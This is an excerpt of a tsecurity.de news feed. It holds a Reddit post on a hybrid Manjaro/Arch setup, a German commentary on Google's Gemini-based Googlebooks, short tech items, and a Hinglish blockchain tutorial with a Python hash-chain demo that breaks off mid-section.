<title><![CDATA[Frankenstein]]></title>
<description><![CDATA[https://preview.redd.it/6prxuwk26y4h1.png?width=923&format=png&auto=webp&s=fafcdf3e148974592364a37020c8bdf6015af9a5 Just for fun, I want to share something to address people installing new distro just to try different desktop environment. Some years ago (after system disk failure) I needed to do ...]]></description>
<link>https://tsecurity.de/de/3568040/linux-tipps/frankenstein/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3568040/linux-tipps/frankenstein/</guid>
<pubDate>Wed, 03 Jun 2026 04:08:39 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p><a href="https://preview.redd.it/6prxuwk26y4h1.png?width=923&amp;format=png&amp;auto=webp&amp;s=fafcdf3e148974592364a37020c8bdf6015af9a5">https://preview.redd.it/6prxuwk26y4h1.png?width=923&amp;format=png&amp;auto=webp&amp;s=fafcdf3e148974592364a37020c8bdf6015af9a5</a></p> <p>Just for fun, I want to share something to address people installing new distro just to try different desktop environment.</p> <p>Some years ago (after system disk failure) I needed to do a fresh install and I wasn't in a mood to repeat the Gentoo experience since I had no time. So the next obvious candidate was Arch, but me being lazy, went with Manjaro minimal for the "next next finish" installation experience.</p> <p>Almost immediately i switched to unstable to be in sync with arch and avoid AUR incompatibilities.</p> <p>Next step was putting ALHP core, extra, multilib as first priority.</p> <p>At some point CachyOS repos added to have clean access to their kernels and proton and whatever else.</p> <p>After recent Manjaro drama, I added regular Arch repos above the Manjaro (with reverse proxy magic).</p> <p>And of course I happily hope between Gnome and Cosmic desktops depending on the mood.</p> <p>So the base Manjaro install became mostly Arch with occasional Manjaro branding and configs.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/_BDYB_"> /u/_BDYB_ </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1tv6lri/frankenstein/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1tv6lri/frankenstein/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Googlebooks sind die ersten Anti-PCs]]></title>
<description><![CDATA[Google hat mit den Googlebooks eine neue Laptop-Kategorie mit Fokus auf Gemini vorgestellt. Sie soll den Umgang mit dem PC grundlegend verändern. Das bringt Vorteile, wirft aber auch einige Fragen auf.



Über Jahrzehnte hinweg waren Personal Computer keine intelligenten Geräte. Sie waren Werkzeu...]]></description>
<link>https://tsecurity.de/de/3565368/it-nachrichten/googlebooks-sind-die-ersten-anti-pcs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3565368/it-nachrichten/googlebooks-sind-die-ersten-anti-pcs/</guid>
<pubDate>Tue, 02 Jun 2026 10:32:07 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Google hat mit den <a href="https://www.pcwelt.de/article/3138293/mit-den-googlebooks-will-google-den-laptop-markt-aufmischen-das-steckt-dahinter.html" target="_blank" rel="noreferrer noopener">Googlebooks</a> eine neue Laptop-Kategorie mit Fokus auf Gemini vorgestellt. Sie soll den Umgang mit dem PC grundlegend verändern. Das bringt Vorteile, wirft aber auch einige Fragen auf.</p>



<p>Über Jahrzehnte hinweg waren Personal Computer keine intelligenten Geräte. Sie waren Werkzeuge, mit denen Sie selbst bestimmen konnten, wie Sie arbeiten und mit Informationen umgehen. Sie konnten Programme installieren, Dateien löschen und Ordner nach Ihren Vorlieben sortieren. Das System blieb dabei passiv und konnte keine eigenen Vorschläge machen oder Eingriffe durchführen. </p>



<p>Genau das soll sich mit den Googlebooks ändern. Mit den neuen Geräten schickt Google die nächste Generation KI-basierter <a href="https://www.pcwelt.de/article/2215385/die-besten-laptops-test.html" target="_blank" rel="noreferrer noopener">Laptops</a> ins Rennen. Googlebooks laufen mit Android und ChromeOS und stehen ganz im Zeichen von Gemini. Dabei geht es nicht nur um neue Funktionen oder schnellere Hardware. Google verfolgt hier eine völlig neue Idee, wie ein Computer arbeiten soll.</p>



<p>Statt auf Eingaben zu reagieren, sollen die Geräte die Absichten ihres Benutzers erkennen und passende Aktionen vorschlagen. Der Computer handelt damit zunehmend eigenständig und nicht mehr ausschließlich unter Ihrer Kontrolle.</p>



<p>Genau das macht die Googlebooks zu etwas völlig Neuem. Es sind die ersten Personal Computer, die sich in gewisser Weise gar nicht mehr wirklich persönlich anfühlen.</p>



<h2 class="wp-block-heading toc">Das Betriebssystem erkennt, was Sie als Nächstes tun wollen</h2>



<p>Googlebooks sind eine Hardware-Plattform für Gemini. Googles Sprachmodell ist tief ins gesamte System integriert und soll Ihre Absichten erkennen, um passende Aktionen vorzuschlagen. Ein anschauliches Beispiel dafür ist das Tool “Magic Pointer”, das mich beim ersten Praxistest allerdings nicht wirklich überzeugen konnte.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a1e94d055b2a"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/googlebooks-gemini-cursor-gif-.gif" alt="Googlebooks Gemini cursor " class="wp-image-3136797" width="552" height="346" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Google</p></div>



<p>Ihr Mauszeiger ist damit nicht länger nur ein Werkzeug, das unauffällig über den Bildschirm gleitet. Stattdessen erkennt das System, worauf Sie zeigen, und liefert passende Vorschläge direkt im Kontext. Lange Texteingaben sind dafür nicht nötig. Es reicht bereits, den Cursor kurz zu bewegen, um die Funktion zu aktivieren.</p>



<p>Das von Googles DeepMind entwickelte Tool “Magic Pointer” beherrscht dabei eine ganze Reihe von Aufgaben. Es kann zwei Bilder kombinieren, markierte Textabschnitte zusammenfassen, einen Tisch im Restaurant reservieren oder Termine direkt per Klick in den Kalender übernehmen. Das System verknüpft Informationen automatisch und arbeitet schneller, als Sie es könnten.</p>



<p>Genau an diesem Punkt verändert sich auch die Rolle des Betriebssystems. Der PC ist nicht länger nur eine passive Arbeitsumgebung, die auf Klicks, Eingaben und Befehle reagiert. Stattdessen beginnt das System, Absichten zu interpretieren und eigenständig Schlüsse zu ziehen.</p>



<p>Wenn Sie diesen Gedanken gruselig finden, sind Sie damit nicht allein. Die entscheidende Frage lautet deshalb, warum Nutzer dieses neue System überhaupt wollen sollten.</p>



<h2 class="wp-block-heading toc">Warum Googlebooks interessant sein könnten</h2>



<p>Viele Nutzer wollen sich einfach nicht durchgehend mit zahllosen Apps, offenen Tabs und kleinen Alltagsentscheidungen beschäftigen. Genau hier setzen die Googlebooks an. Sie verknüpfen verschiedene Dienste und Aufgaben stärker miteinander und könnten dadurch für viele wie eine spürbare Entlastung wirken.</p>



<p>Es ist schlicht menschlich, im Alltag Termine zu vergessen oder den Überblick zu verlieren. Das System soll deshalb wie eine Art digitales Sicherheitsnetz funktionieren, das im Hintergrund mitdenkt und den Alltag erleichtert.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a1e94d0566c2"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/googlebook-keyboard.png?w=1200" alt="googlebook keyboard" class="wp-image-3137866" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Google</p></div>



<p>Auch wenn das System viele kleine Alltagsprobleme beseitigt, hat das seinen Preis. Je mehr Aufgaben Ihnen automatisch abgenommen werden, desto weniger müssen Sie selbst nachdenken oder Entscheidungen treffen. Wenn Sie beispielsweise keine Kalendereinträge mehr erstellen müssen, weil das System das automatisch erledigt, stellt sich irgendwann die Frage, was mit dieser Fähigkeit passiert.</p>



<p>Verlernen wir bestimmte Abläufe mit der Zeit, weil wir sie nicht mehr selbst ausführen? Und was passiert, wenn genau das zur Normalität wird? Welche Fähigkeiten geben wir dabei Stück für Stück auf?</p>



<h2 class="wp-block-heading toc">Wenn uns Systeme das Denken abnehmen</h2>



<p>Reisen wir kurz ein Stück in der Zeit zurück: Klassische Personal Computer boten standardmäßig eine leere Arbeitsfläche. Nichts wurde für Sie interpretiert. Wenn Sie etwas erledigen wollten, mussten Sie selbst herausfinden, wie es geht. Dabei waren lediglich der eigene Verstand und die Hilfe von Gleichgesinnten in Internetforen verfügbar. Selbst scheinbar einfache Dinge wie das Suchen nach einer Datei oder das Anlegen eines Kalendereintrags bestanden aus einer bewussten Abfolge einzelner Schritte. Um zum Ergebnis zu gelangen, mussten Sie den Prozess aktiv durchlaufen.</p>



<p>Das ist entscheidend, um ein Betriebssystem wirklich zu beherrschen. Sie müssen wissen, welche Werkzeuge wofür gedacht sind und wo bestimmte Funktionen zu finden sind. Bei einem KI-basierten System wie dem neuen Googlebook könnte dieses Wissen jedoch nach und nach an Bedeutung verlieren.</p>



<p>Ist ein solches KI-System effizient? Mit Sicherheit. Doch genau diese Effizienz verändert das Verhältnis zwischen Ihnen und Ihrem Gerät grundlegend.</p>



<h2 class="wp-block-heading toc">Der PC verändert sich</h2>



<p>Der ursprüngliche Personal Computer gab Nutzern eine nie dagewesene Kontrolle über Informationen und Werkzeuge und bot zugleich viel Raum zum Entdecken und Ausprobieren. Sie lernten das System kennen, indem Sie aktiv nach Funktionen suchten und Probleme lösten. </p>



<p>Googlebooks funktionieren grundsätzlich anders. Sie warten nicht mehr auf Ihre Eingaben, sondern versuchen, Ihre nächsten Schritte vorherzusagen und darauf basierende Handlungsvorschläge zu machen. Googles neue Laptops versprechen reibungslose Unterstützung und smarte Hilfe im Alltag.</p>



<p>Das wird sich für viele Nutzer vermutlich sehr angenehm anfühlen. Doch dieses Prinzip verändert das Verständnis davon, was ein Personal Computer eigentlich ist. Ein Computer, der Ihre Bedürfnisse vorwegnimmt und zugleich Ihre Auswahlmöglichkeiten einschränkt, mag hochgradig personalisiert sein, wirkt aber im Kern paradoxerweise unpersönlich.</p>



<p>Googlebooks könnten die ersten Laptops sein, die genau zu wissen scheinen, was Sie wollen. Gleichzeitig stellt sich aber auch die Frage, wer dann eigentlich die Kontrolle hat. </p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[We went inside the Magic of Disney Animation before it opens at Disney World — and Disney is rebuilding animation as a physical experience]]></title>
<description><![CDATA[I went behind the walls of Disney World’s Magic of Disney Animation as it is being built and saw how Disney is reimagining the space as a multi-part attraction that lets guests step inside the animation pipeline.]]></description>
<link>https://tsecurity.de/de/3564535/it-nachrichten/we-went-inside-the-magic-of-disney-animation-before-it-opens-at-disney-world-and-disney-is-rebuilding-animation-as-a-physical-experience/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3564535/it-nachrichten/we-went-inside-the-magic-of-disney-animation-before-it-opens-at-disney-world-and-disney-is-rebuilding-animation-as-a-physical-experience/</guid>
<pubDate>Tue, 02 Jun 2026 01:17:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[I went behind the walls of Disney World’s Magic of Disney Animation as it is being built and saw how Disney is reimagining the space as a multi-part attraction that lets guests step inside the animation pipeline.]]></content:encoded>
</item>
<item>
<title><![CDATA[Rerankers Aren’t Magic Either: When the Cross-Encoder Layer Is Worth the Cost]]></title>
<description><![CDATA[Enterprise Document Intelligence [Vol. 1 #2bis] Why stacking a reranker on top of weak retrieval doesn’t save it, what cross-encoders actually fix vs what they don’t, and where the editorial position of the series lands.
The post Rerankers Aren’t Magic Either: When the Cross-Encoder Layer Is Wort...]]></description>
<link>https://tsecurity.de/de/3561011/ai-nachrichten/rerankers-arent-magic-either-when-the-cross-encoder-layer-is-worth-the-cost/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3561011/ai-nachrichten/rerankers-arent-magic-either-when-the-cross-encoder-layer-is-worth-the-cost/</guid>
<pubDate>Sun, 31 May 2026 17:17:28 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Enterprise Document Intelligence [Vol. 1 #2bis] Why stacking a reranker on top of weak retrieval doesn’t save it, what cross-encoders actually fix vs what they don’t, and where the editorial position of the series lands.</p>
<p>The post <a href="https://towardsdatascience.com/rerankers-arent-magic-either-when-the-cross-encoder-layer-is-worth-the-cost-enterprise-document-intelligence-vol-1-2bis/">Rerankers Aren’t Magic Either: When the Cross-Encoder Layer Is Worth the Cost</a> appeared first on <a href="https://towardsdatascience.com/">Towards Data Science</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Blockchain Kya Hota Hai? Bilkul Zero Se Samjho!]]></title>
<description><![CDATA[Series: Web3 Security Zero se Advance | Article #1By HackerMD | 18 min readAaj Kya Seekhenge?Blockchain kya hota hai real life example seWeb2 vs Web3 fark kya hai?Block kya hota hai andar kya hota hai?Chain kaise banti hai?Decentralization kya hota hai?Consensus mechanisms network agree kaise kar...]]></description>
<link>https://tsecurity.de/de/3559914/hacking/blockchain-kya-hota-hai-bilkul-zero-se-samjho/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3559914/hacking/blockchain-kya-hota-hai-bilkul-zero-se-samjho/</guid>
<pubDate>Sun, 31 May 2026 03:04:38 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*YTrDDpFgQCWkEyHMHlkrCw.png"></figure><p><strong>Series: Web3 Security Zero se Advance | Article #1</strong><br><em>By HackerMD | 18 min read</em></p><h3>Aaj Kya Seekhenge?</h3><ul><li>Blockchain kya hota hai real life example se</li><li>Web2 vs Web3 fark kya hai?</li><li>Block kya hota hai andar kya hota hai?</li><li>Chain kaise banti hai?</li><li>Decentralization kya hota hai?</li><li>Consensus mechanisms network agree kaise karta hai?</li><li>Hash kya hota hai security kaise kaam karti hai?</li><li>Blockchain ke types Public, Private, Hybrid</li><li>Real world use cases</li><li>Web3 Security mein kyu zaroori hai yeh sab samajhna?</li></ul><blockquote><strong>Note:</strong> Yeh series <strong>Web3 Security</strong> ke liye hai isliye har concept ko <strong>hacker ki nazar se</strong> samjhenge! Jo samjha woh attack kar sakta hai jo attack kar sakta hai woh <strong>defend aur bug bounty</strong> bhi kar sakta hai!</blockquote><h3>Pehle Ek Story Sab Clear Ho Jaayega!</h3><p>Socho tumhare mohalle mein ek <strong>dukaan</strong> hai</p><pre>Ramesh Ki Dukaan<br>   Ek register hai — jisme sab kuch likha hai:<br>   → Kisne kitne paise diye<br>   → Kisne kitna udhaara liya<br>   → Kab diya, kab liya<br><br>Problem:<br>   → Register sirf Ramesh ke paas hai<br>   → Ramesh galat likh sakta hai<br>   → Register jal sakta hai, kho sakta hai<br>   → Ramesh cheat kar sakta hai — koi rok nahi!<br><br>Yeh hai Web2 / Traditional System:<br>   CENTRALIZED — ek jagah, ek insaan ka control</pre><p>Ab socho yeh register ki <strong>1000 copies</strong> ho jaayein</p><pre> Register Copy #1   → Ramesh ke paas<br> Register Copy #2   → Suresh ke paas<br> Register Copy #3   → Mahesh ke paas<br> Register Copy #4   → Ganesh ke paas<br>... aur 996 aur copies duniya bhar mein ...<br><br>Ab agar Ramesh apni copy mein fraud kare:<br>   → Baaki 999 copies se compare hoga<br>   → 999 copies bolegi — "Yeh GALAT hai!"<br>   → Ramesh ki fraud copy REJECT ho jaayegi!<br>   → Koi ek akela insaan system ko corrupt<br>     NAHI kar sakta!<br><br>Yeh hai BLOCKCHAIN!</pre><h3>PART 1: Blockchain Exact Definition</h3><pre>Blockchain = Block + Chain<br><br>Block  = Data ka ek packet (register ka ek page)<br>Chain  = Sare blocks ek dusre se linked hain<br><br>Simple definition:<br>"Ek distributed digital register jo<br> hazaaron computers pe exist karta hai,<br> jisme data secure, transparent aur<br> tamper-proof tarike se store hota hai"<br><br>Technical definition:<br>"A decentralized, immutable ledger of<br> transactions maintained across a<br> peer-to-peer network using cryptography"</pre><h3>PART 2: Block Kya Hota Hai? Andar Kya Hai?</h3><p>Ek block ek <strong>dabba</strong> ki tarah hai usme yeh hota hai:</p><pre>┌─────────────────────────────────────┐<br>│           BLOCK #4721               │<br>├─────────────────────────────────────┤<br>│ Block Number   : 4721               │<br>│ Timestamp      : 2024-01-15 14:23   │<br>│ Nonce          : 83729              │<br>│                                     │<br>│ Previous Hash  :                    │<br>│ 0x1a2b3c4d5e6f...                   │<br>│ ← Pichle block ka "fingerprint"     │<br>│                                     │<br>│ Current Hash   :                    │<br>│ 0x9z8y7x6w5v4u...                   │<br>│ ← Is block ka "fingerprint"         │<br>│                                     │<br>│ Transactions   :                    │<br>│  → Alice → Bob   : 0.5 ETH          │<br>│  → Bob   → Carol : 1.2 ETH          │<br>│  → Carol → Dave  : 0.3 ETH          │<br>│  → [50+ aur transactions...]        │<br>│                                     │<br>│ Merkle Root    : 0xabc123...        │<br>└─────────────────────────────────────┘</pre><h3>Har Field Ka Matlab:</h3><p><strong>1. Block Number:</strong></p><pre>Har block ka serial number hota hai<br>Block #0 = Genesis Block (sabse pehla)<br>Block #1, #2, #3... aise badhte hain<br>Ethereum pe ab 19 million+ blocks hain!</pre><p><strong>2. Timestamp:</strong></p><pre>Exactly kab yeh block create hua<br>Unix timestamp format mein store hota hai<br>Tamper proof baad mein change nahi hota</pre><p><strong>3. Nonce (Number Used Once):</strong></p><pre>Yeh ek magic number hai<br>Miners isko trial-and-error se dhundhte hain<br>Proof of Work (PoW) mein critical role hai<br>Baad mein PoW section mein detail mein samjhenge</pre><p><strong>4. Previous Hash Sabse Important!</strong></p><pre>Yeh woh cheez hai jo CHAIN banati hai!<br><br>Block #1 ka Previous Hash = Block #0 ka Hash<br>Block #2 ka Previous Hash = Block #1 ka Hash<br>Block #3 ka Previous Hash = Block #2 ka Hash<br><br>Agar koi Block #2 mein koi cheez change kare:<br>   → Block #2 ka Hash bilkul ALAG ho jaayega<br>   → Block #3 ka "Previous Hash" match nahi karega!<br>   → Block #3 INVALID!<br>   → Block #4 bhi INVALID!<br>   → Poori aage ki chain break!<br><br>ISLIYE blockchain tamper-proof hai! </pre><p><strong>5. Current Hash:</strong></p><pre>Is block ka unique fingerprint<br>Block ke saare data se milke banta hai<br>Ek bhi byte change → Hash bilkul alag ho jaata hai!<br><br>Example:<br>"Hello"  → Hash: 185f8db32921bd46...<br>"hello"  → Hash: 2cf24dba5fb0a30e...<br>(sirf capital H se lowercase h — completely different!)</pre><p><strong>6. Transactions:</strong></p><pre>Is block mein recorded sabhi transactions<br>Bitcoin pe : Kisne kitna kisko bheja<br>Ethereum pe: Transactions + Smart contract calls<br>Ek block mein typically 100–3000 transactions</pre><p><strong>7. Merkle Root:</strong></p><pre>Sabhi transactions ka ek combined "summary hash"<br>Merkle Tree se banta hai (binary tree structure)<br>Ek bhi transaction change → Merkle Root change!<br>Quick verification allow karta hai</pre><h3>PART 3: Chain Kaise Banti Hai? Visual!</h3><pre>GENESIS BLOCK (Block #0)<br>┌──────────────────────┐<br>│ Block   #0           │<br>│ PrevHash: 0x0000000  │ ← Koi prev nahi!<br>│ Hash    : 0xAAA111   │<br>│ Txns    : [...]      │<br>└──────────────────────┘<br>          │<br>          │ Hash: 0xAAA111<br>          ↓<br>BLOCK #1<br>┌──────────────────────┐<br>│ Block   #1           │<br>│ PrevHash: 0xAAA111   │ ← Block #0 ka hash!<br>│ Hash    : 0xBBB222   │<br>│ Txns    : [...]      │<br>└──────────────────────┘<br>          │<br>          │ Hash: 0xBBB222<br>          ↓<br>BLOCK #2<br>┌──────────────────────┐<br>│ Block   #2           │<br>│ PrevHash: 0xBBB222   │ ← Block #1 ka hash!<br>│ Hash    : 0xCCC333   │<br>│ Txns    : [...]      │<br>└──────────────────────┘<br>          │<br>          │ Hash: 0xCCC333<br>          ↓<br>BLOCK #3 (Latest)<br>┌──────────────────────┐<br>│ Block   #3           │<br>│ PrevHash: 0xCCC333   │ ← Block #2 ka hash!<br>│ Hash    : 0xDDD444   │<br>│ Txns    : [...]      │<br>└──────────────────────┘<br><br>━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━<br><br>Ab agar koi FRAUD karne ki koshish kare:<br><br>FRAUD ATTEMPT → Block #1 mein change:<br><br>Block #1 (Tampered)<br>┌──────────────────────┐<br>│ Block   #1           │<br>│ PrevHash: 0xAAA111   │<br>│ Hash    : 0xXXXXXX   │ ← Hash BADAL GAYA!<br>│ Txns    : [FRAUD!]   │<br>└──────────────────────┘<br>          │<br>          ↓<br>Block #2 — INVALID! <br>┌──────────────────────┐<br>│ Block   #2           │<br>│ PrevHash: 0xBBB222   │ ← 0xXXXXXX se<br>│                      │   match nahi hoga!<br>│    REJECTED by       │<br>│    ALL NODES!        │<br>└──────────────────────┘<br><br>Fraud detect ho gaya!<br>Network ne reject kar diya!</pre><h3>PART 4: Decentralization Asli Takat!</h3><pre>CENTRALIZED (Web2 — Aaj ka internet):<br><br>              ┌─────────┐<br>              │  SERVER │   ← Ek jagah sab kuch<br>              │ (Google,│<br>              │  Banks) │<br>              └─────────┘<br>             /     │     \<br>          User1  User2  User3<br><br>Problems:<br>   → Single point of failure<br>   → Hack ho sakta hai — sab data gone!<br>   → Company band ho jaaye → sab gone<br>   → Company tumhara data sell kar sakti hai<br>   → Account freeze ho sakta hai!<br>   → Government pressure pe data de sakti hai<br><br>━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━<br><br>DECENTRALIZED (Web3 — Blockchain):<br><br>  Node1 ─── Node2 ─── Node3<br>    │   ╲  /    ╲  /    │<br>    │    ╲╱      ╲╱     │<br>  Node4 ─── Node5 ─── Node6<br>    │   ╲  /    ╲  /    │<br>  Node7 ─── Node8 ─── Node9<br><br>Har Node = Ek computer jiske paas<br>           POORI blockchain ki copy hai!<br><br>Ethereum pe: 7,000+ full nodes worldwide!<br><br>Ek node hack ho jaaye?<br>   → Koi fark nahi! 6,999 aur hain!<br>   → Hacker ko 51%+ nodes simultaneously<br>     hack karna padega<br>   → Practically impossible!<br>   → Bahut zyada expensive!</pre><h3>Node Ke Types:</h3><pre>Full Node:<br>   → Poori blockchain download karke rakhi hai<br>   → Sari transactions verify karta hai<br>   → Network ka backbone<br>   → Ethereum full node: ~1 TB storage<br><br>Light Node:<br>   → Sirf latest blocks store karta hai<br>   → Full node pe kuch checks ke liye trust<br>   → Mobile wallets yeh use karte hain<br><br>Validator Node (PoS):<br>   → New blocks propose aur validate karta hai<br>   → 32 ETH stake karna padta hai<br>   → Reward milta hai ETH mein<br><br>Miner Node (PoW):<br>   → Puzzles solve karke new blocks banata hai<br>   → BTC/ETH reward milta tha<br>   → Bitcoin pe aaj bhi yahi hota hai</pre><h3>PART 5: Hash Kya Hota Hai? Security Ki Neev!</h3><pre>Hash Function = Ek mathematical function jo:<br>   → Koi bhi size ka INPUT le sakta hai<br>   → FIXED SIZE output deta hai<br>   → Same input → HAMESHA same output<br>   → Alag input → BILKUL alag output<br>   → Output se input NIKALNA IMPOSSIBLE!<br>     (One-way function)<br><br>Blockchain Ethereum Keccak-256 use karta hai:<br><br>Input : "Hello"<br>Hash  : 185f8db32921bd46d35c94b7af8d31e4<br>        7bc7cef372f58dd1dbb1f90d2e7b9d98<br><br>Input : "Hello."   ← Sirf ek dot add kiya<br>Hash  : f9d4e24420b9570b43f1e9c6f4e5bb2f<br>        4b3b9e3d1c2a8f7e6d5c4b3a291e8d7c<br>        (BILKUL ALAG!)<br><br>Input : [Poori Harry Potter series — 500 pages]<br>Hash  : a1b2c3d4...  (Same 64 characters!)<br><br>Input : [Poori Wikipedia — Terabytes]<br>Hash  : x9y8z7w6...  (Same 64 characters!)<br><br>Blockchain mein use:<br>   → Block ka hash    = Block ka fingerprint<br>   → Transaction ID   = Transaction ka hash<br>   → Merkle Root      = All txns ka combined hash<br>   → Password storage = Hash stored, not password</pre><h3>Python Mein Khud Try Karo:</h3><pre>import hashlib<br>import json<br><br>def sha256_hash(text):<br>    return hashlib.sha256(<br>        text.encode()<br>    ).hexdigest()<br><br># Basic demo<br>print(sha256_hash("Hello"))<br># 185f8db32921bd46d35c94...<br><br>print(sha256_hash("Hello."))<br># f9d4e24420b9570b43f1e9...<br># Completely different!<br><br># ─── Mini Blockchain Simulation ───────────<br><br>class Block:<br>    def __init__(self, number, data, prev_hash):<br>        self.number    = number<br>        self.data      = data<br>        self.prev_hash = prev_hash<br>        self.hash      = self.calculate_hash()<br><br>    def calculate_hash(self):<br>        content = json.dumps({<br>            "number"    : self.number,<br>            "data"      : self.data,<br>            "prev_hash" : self.prev_hash<br>        })<br>        return sha256_hash(content)<br><br># Genesis Block<br>block0 = Block(0, "Genesis Block", "0" * 64)<br>print(f"\nBlock #0 Hash: {block0.hash[:20]}...")<br><br># Block #1<br>block1 = Block(1, "Alice→Bob: 1 ETH", block0.hash)<br>print(f"Block #1 Hash: {block1.hash[:20]}...")<br><br># Block #2<br>block2 = Block(2, "Bob→Carol: 0.5 ETH", block1.hash)<br>print(f"Block #2 Hash: {block2.hash[:20]}...")<br><br># ─── Tamper Attempt ───────────────────────<br>print("\n--- FRAUD ATTEMPT ---")<br>print(f"Original Block #1 hash: {block1.hash[:20]}...")<br><br># Attacker changes transaction data!<br>block1.data = "Alice→Bob: 9999 ETH"  # Fraud!<br>block1.hash = block1.calculate_hash()<br>print(f"Tampered Block #1 hash: {block1.hash[:20]}...")<br><br># Block #2 ka prev_hash ab match nahi karega!<br>if block2.prev_hash != block1.hash:<br>    print("❌ FRAUD DETECTED!")<br>    print("   Block #2 prev_hash mismatch!")<br>    print("   Network ne REJECT kar diya!")<br>else:<br>    print("✅ Chain valid")</pre><p><strong>Output:</strong></p><pre>Block #0 Hash: 6b86b273ff34fce1...<br>Block #1 Hash: 3f79bb7b435b05...<br>Block #2 Hash: 2c624232cdd221...<br><br>--- FRAUD ATTEMPT ---<br>Original Block #1 hash: 3f79bb7b435b05...<br>Tampered  Block #1 hash: a8f5f167f44f4d...<br><br>   FRAUD DETECTED!<br>   Block #2 prev_hash mismatch!<br>   Network ne REJECT kar diya!</pre><h3>PART 6: Consensus Mechanism Network Agree Kaise Karta Hai?</h3><pre>Problem:<br>   1000 nodes hain — koi naya block aata hai<br>   Kaun decide karega valid hai ya nahi?<br>   Koi central authority nahi — toh?<br><br>Solution: Consensus Mechanism<br>   "Rules jinpe sare nodes agree karte hain"</pre><h3>Proof of Work (PoW) Bitcoin Wala:</h3><pre>Concept: Kaam karo — reward pao!<br><br>Process:<br>   1. Pending transactions mempool mein aate hain<br>   2. Miners compete karte hain<br>   3. Competition: Ek mathematical puzzle solve karo<br>   4. Puzzle: Ek "Nonce" dhundho taaki block ka hash<br>              "00000..." se shuru ho<br>   5. Sirf trial-and-error se possible hai<br>   6. Pehla miner jo solve kare → block add karta hai<br>   7. Reward milta hai: Currently 3.125 BTC (~$200K!)<br><br>Visual:<br>   Nonce = 0    : Hash = "a7f3bc9e..." <br>   Nonce = 1    : Hash = "9d2e1f4a..." <br>   Nonce = 2    : Hash = "3k8m2n7p..." <br>   Nonce = 83729: Hash = "00000a1b..." FOUND!<br><br>Kyun secure hai?<br>   → Valid block banane mein enormous energy lagti hai<br>   → Fraud ke liye honest mining se zyada kaam<br>   → 51% attack = Duniya ki 50% computing power<br>   → Bitcoin 51% attack cost: $20 Billion+/hour!<br><br>Problem:<br>   → Bahut zyada electricity consume karta hai<br>   → Bitcoin = Portugal jaisi country ka energy!</pre><h3>Proof of Stake (PoS) Ethereum Wala (2022 se):</h3><pre>Concept: Stake karo — validator bano!<br><br>Process:<br>   1. 32 ETH 